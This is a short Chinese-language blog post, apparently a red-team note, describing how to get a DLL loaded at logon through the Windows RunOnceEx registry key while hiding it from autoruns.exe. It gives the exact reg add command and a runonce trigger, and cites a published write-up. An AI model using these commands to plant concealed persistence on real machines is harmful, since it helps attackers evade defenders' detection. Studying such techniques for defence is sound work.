RunOnceEx
视频演示:
使用RunOnceEx进行持久化 - 隐藏自Autoruns.exe
1.发现一种技术来执行DLL文件,而不会在登录时被autoruns.exe检测到。
需要管理员权限,不属于userland。
运行这个漏洞
1 | reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Users\demon\mbox.dll" |
2.mbox.dll将在下次登录时启动。或者你可以运行这个命令来触发执行:
1 | runonce /Explorer |
链接(link):https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
https://support.microsoft.com/en-us/help/310593/description-of-the-runonceex-registry-key
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Demon!
